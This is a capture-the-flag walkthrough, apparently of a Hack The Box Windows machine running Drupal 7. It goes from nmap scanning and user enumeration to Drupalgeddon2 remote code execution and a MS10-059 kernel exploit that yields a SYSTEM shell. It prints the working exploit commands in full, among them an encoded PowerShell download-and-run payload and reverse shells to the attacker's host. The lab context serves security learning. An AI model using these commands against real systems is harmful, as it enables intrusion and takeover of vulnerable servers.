Initial nmap
sudo nmap -sS -sV -p- -T4 -Pn -n –disable-arp-ping -v 10.10.10.9
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
HTTP is running Drupal CMS. Version 7 as shown via Wappalyzer plugin and the response headers. IIS Server 7.5.
HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate Content-Type: text/html; charset=utf-8 Content-Language: en Expires: Sun, 19 Nov 1978 05:00:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.3.28 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Generator: Drupal 7 (http://drupal.org) X-Powered-By: ASP.NET Date: Thu, 21 Oct 2021 04:59:01 GMT Content-Length: 7583
Exploring the CMS a bit finds user enumeration in the Request New Password page.
None-Existing user:
"Sorry, youcannotbehere is not recognized as a user name or an e-mail address."
Existing User(admin):
"Unable to send e-mail. Contact the site administrator if the problem persists."
Doing a searchsploit check on Drupal 7 finds a vulnerability called “Drupalgeddon”:
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
Cranking out Metasploit for a quick win I find it confirms the machine is vulnerable but is unable to exploit it.
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run [*] Started reverse TCP handler on 10.10.14.12:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. [*] Exploit completed, but no session was created.
Typing CVE-2018-7600 into github finds an exploit that gets RCE
https://github.com/pimps/CVE-2018-7600
python3 drupa7-CVE-2018-7600.py http://10.10.10.9 -c whoami ============================================================================= | DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) | | by pimps | ============================================================================= [*] Poisoning a form and including it in cache. [*] Poisoned form ID: form-TbrNh5DKlNwJLDRO8jWUsOZAiqbkqxXlSjek3an9kSs [*] Triggering exploit to execute: whoami nt authority\iusr
Popping a meterpretter session using the web delivery payload
python3 drupa7-CVE-2018-7600.py http://10.10.10.9 -c "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABkAHUAYQBlAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAGQAdQBhAGUALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABkAHUAYQBlAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAyADoAOAAwADgAMAAvADAAVwBjAFcAeAByAHcATgBCAGYAdABiAC8ARwB4ADEATgBHADUAaAB1AGYANQBiAHYAbAAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAyADoAOAAwADgAMAAvADAAVwBjAFcAeAByAHcATgBCAGYAdABiACcAKQApADsA" [*] 10.10.10.9 web_delivery - Delivering AMSI Bypass (1405 bytes) [*] 10.10.10.9 web_delivery - Delivering Payload (3514 bytes) [*] Sending stage (175174 bytes) to 10.10.10.9 [*] Meterpreter session 1 opened (10.10.14.12:4444 -> 10.10.10.9:49973 ) at 2021-10-21 01:13:19 -0400
Checking for easy wins
meterpreter > run post/multi/recon/local_exploit_suggester [*] 10.10.10.9 - Collecting local exploits for x86/windows... [*] 10.10.10.9 - 4 exploit checks are being tried... [+] 10.10.10.9 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
Exploit did not want to work due to architecture problems.
[-] Exploit aborted due to failure: no-target: Running against via WOW64 is not supported, try using an x64 meterpreter...
Switching to x64 payload did not work either
set payload windows/x64/meterpreter/reverse_tcp [-] Exploit aborted due to failure: no-target: Running against via WOW64 is not supported, try using an x64 meterpreter...
Migrating to the only x64 process available killed the meterpreter shell.
Running windows exploit suggester finds this machine vulnerable to kernal MS10-059. It can be downloaded from:
https://github.com/SecWiki/windows-kernel-exploits
C:\inetpub\drupal-7.54>.\kernal.exe 10.10.14.12 6666 .\kernal.exe 10.10.14.12 6666 /Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR> listening on [any] 6666 ... connect to [10.10.14.12] from (UNKNOWN) [10.10.10.9] 49981 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\inetpub\drupal-7.54>whoami whoami nt authority\system